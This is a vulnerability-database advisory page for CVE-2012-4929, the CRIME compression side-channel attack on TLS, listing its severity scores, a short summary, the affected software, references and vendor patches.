Lumension® Endpoint Intelligence Center

Intelligence Center » Browse All Vulnerabilities » CVE-2012-4929

Overview

Vulnerability Score 2.6 2.6
CVE Id CVE-2012-4929
Last Modified 01 Sep 2015 01:00:43
Published 15 Sep 2012 02:55:03
Confidentiality Impact PARTIAL PARTIAL
Integrity Impact NONE NONE
Availability Impact NONE NONE
Access Vector NETWORK
Access Complexity HIGH
Authentication NONE

CVE-2012-4929

Summary

The TLS protocol 1.2 and earlier, as used in Mozilla Firefox, Google Chrome, Qt, and other products, can encrypt compressed data without properly obfuscating the length of the unencrypted data, which allows man-in-the-middle attackers to obtain plaintext HTTP headers by observing length differences during a series of guesses in which a string in an HTTP request potentially matches an unknown string in an HTTP header, aka a "CRIME" attack.

Vulnerable Systems

Operating System

  • Debian Linux 7.0

  • Debian Linux 8.0

Application

  • Google Chrome

  • Mozilla Firefox


References

MISC - https://threatpost.com/en_us/blogs/demo-crime-tls-attack-091212

MISC - https://gist.github.com/3696912

MISC - https://community.qualys.com/blogs/securitylabs/2012/09/14/crime-information-leakage-attack-against-ssltls

CONFIRM - https://chromiumcodereview.appspot.com/10825183

MISC - http://www.theregister.co.uk/2012/09/14/crime_tls_attack/

MISC - http://www.iacr.org/cryptodb/data/paper.php?pubkey=3091

MISC - http://www.ekoparty.org/2012/thai-duong.php

MISC - http://threatpost.com/en_us/blogs/new-attack-uses-ssltls-information-leak-hijack-https-sessions-090512

MISC - http://threatpost.com/en_us/blogs/crime-attack-uses-compression-ratio-tls-requests-side-channel-hijack-secure-sessions-091312

MISC - http://security.stackexchange.com/questions/19911/crime-how-to-beat-the-beast-successor

MISC - http://news.ycombinator.com/item?id=4510829

MISC - http://isecpartners.com/blog/2012/9/14/details-on-the-crime-attack.html

CONFIRM - http://code.google.com/p/chromium/issues/detail?id=139744

MISC - http://arstechnica.com/security/2012/09/crime-hijacks-https-sessions/

CONFIRM - https://bugzilla.redhat.com/show_bug.cgi?id=857051

UBUNTU - USN-1628-1

SUSE - openSUSE-SU-2012:1420

DEBIAN - DSA-2579

UBUNTU - USN-1627-1

BID - 55704

SUSE - openSUSE-SU-2013:0157

SUSE - openSUSE-SU-2013:0143

DEBIAN - DSA-2627

REDHAT - RHSA-2013:0587

CONFIRM - http://support.apple.com/kb/HT5784

APPLE - APPLE-SA-2013-06-04-1

UBUNTU - USN-1898-1

FEDORA - FEDORA-2013-4403

DEBIAN - DSA-3253

Related Patches

Apple 2013-06-04 Security Update 2013-002 Server (Lion)

Novell SUSE 2012:6935 libQtWebKit-devel security update for SLE 11 SP2 i586

Novell SUSE 2012:6935 libQtWebKit-devel security update for SLE 11 SP2 x86_64

Novell SUSE 2013:7548 libopenssl-devel security update for SLE 11 SP2 i586

Novell SUSE 2013:7548 libopenssl-devel security update for SLE 11 SP2 x86_64

Novell SUSE 2013:8517 openssl security update for SLE 10 SP4 i586

Novell SUSE 2013:8517 openssl security update for SLE 10 SP4 x86_64


Last Updated: 27 May 2016 11:00:43